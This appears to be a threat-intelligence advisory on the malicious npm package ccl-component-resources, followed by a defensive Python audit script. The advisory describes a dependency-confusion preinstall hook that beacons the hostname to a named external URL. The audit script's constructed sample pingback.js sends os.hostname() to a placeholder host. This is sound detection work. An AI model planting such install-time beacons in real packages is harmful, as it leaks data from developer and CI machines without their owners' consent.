Supply-chain threat intelligence

Incident detail

critical · npm · malware · osv

Malicious code in ccl-component-resources (npm)

ccl-component-resources

Risk score

92

AI summary

Indexed incident for ccl-component-resources (npm).

Description

ccl-component-resources@99.0.0 is a dependency-confusion package: name targets a likely-internal package, semver is set to 99.0.0 to win resolution against private registries, and index.js is an empty stub (module.exports = {}). package.json declares a preinstall lifecycle hook that runs node pingback.js. pingback.js reads os.hostname() and POSTs a JSON payload ({hn,...package name, timestamp}) to https://c.adityasec.com/hJWEvPPiaUrSeF-9_F8XSw on every npm install. Any installer whose private dependency resolution mistakenly pulls this public package will leak the host identifier of the affected dev or CI machine to an external server. The package self-describes as an 'authorized PoC,' but the beacon fires unconditionally for every installer regardless of authorization, and the destination is attacker-controlled from the installer's perspective.
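A defender-side check for the indicators described above (install-time lifecycle hooks, an inflated version chosen to win resolution, an empty entry point, and a script that reads the hostname and contacts a URL). This is an added example, not code from the advisory or from ThreatPkg; it assumes the fetched package's package.json and file contents are already available as text, and the beacon URL in the constructed sample is a placeholder.

```python
import json
import re

# Lifecycle hooks that npm runs automatically during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")

def audit_npm_package(manifest_json, files):
    """Return dependency-confusion indicators for one fetched package.

    manifest_json: text of package.json; files: {path: source text}.
    """
    pkg = json.loads(manifest_json)
    findings = []
    scripts = pkg.get("scripts", {})
    for hook in INSTALL_HOOKS:
        if hook in scripts:
            findings.append("lifecycle hook %s runs: %s" % (hook, scripts[hook]))
    # Inflated majors (e.g. 99.0.0) beat a private registry's copy during
    # resolution; the >= 90 threshold is a constructed heuristic, not a standard.
    major = int(pkg.get("version", "0").split(".")[0])
    if major >= 90:
        findings.append("suspiciously high version %s" % pkg["version"])
    # An entry point that exports nothing: the package exists only for its hooks.
    main = pkg.get("main", "index.js")
    if re.fullmatch(r"\s*module\.exports\s*=\s*\{\s*\}\s*;?\s*", files.get(main, "x")):
        findings.append("entry point %s is an empty stub" % main)
    # Scripts that read host identity and reference a URL behave as beacons.
    for path, src in files.items():
        if "os.hostname()" in src and re.search(r"https?://", src):
            findings.append("%s reads os.hostname() and contacts a URL" % path)
    return findings

# Constructed sample mirroring the package described above (placeholder URL).
SAMPLE_MANIFEST = json.dumps({
    "name": "ccl-component-resources",
    "version": "99.0.0",
    "main": "index.js",
    "scripts": {"preinstall": "node pingback.js"},
})
SAMPLE_FILES = {
    "index.js": "module.exports = {};\n",
    "pingback.js": (
        "const os = require('os');\n"
        "const body = JSON.stringify({hn: os.hostname()});\n"
        "fetch('https://beacon.example.invalid/', {method: 'POST', body});\n"
    ),
}

if __name__ == "__main__":
    for finding in audit_npm_package(SAMPLE_MANIFEST, SAMPLE_FILES):
        print("FLAG:", finding)
```

Run the same audit over every package in a lockfile diff before merging, and treat any finding on a package whose name also exists in a private registry as a blocking result.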

Technical details

Affected versions

= 1.0.732, = 99.0.0

Indicators

  • affected version = 1.0.732 (confidence 75%)
  • affected version = 99.0.0 (confidence 75%)

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg
